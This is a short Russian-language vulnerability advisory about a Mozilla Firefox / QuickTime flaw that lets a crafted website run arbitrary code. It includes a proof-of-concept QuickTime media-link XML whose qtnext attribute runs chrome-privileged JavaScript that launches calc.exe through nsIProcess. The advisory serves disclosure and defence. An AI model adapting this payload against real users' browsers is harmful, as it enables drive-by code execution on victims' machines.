Программа: Mozilla Firefox / QuickTime

Уязвимость позволяет удаленному злоумышленнику выполнить произвольный код на целевой системе. Уязвимость существует из-за некорректного взаимодействия с QuickTime при обработке различных медиа форматов (mp3, avi, move, mpeg). Атакующий может заманить пользователя на специально составленный сайт, что приведет к выполнению произвольного кода.

Пример:

<?xml version="1.0">
<?quicktime type="application/x-quicktime-media-link"?>
<embed src="a.mp3" autoplay="true" qtnext="-chrome javascript:file=Components.classes[‘@mozilla.org/file/local;1’].createInstance(Components.interfaces.nsILocalFile); file.initWithPath(‘c:\\windows\\system32\\calc.exe’);process=Components.classes[‘@mozilla.org/process/util;1’].createInstance(Components.interfaces.nsIProcess); process.init(file);process.run(true,[],0);void(0);"/>



Оставить мнение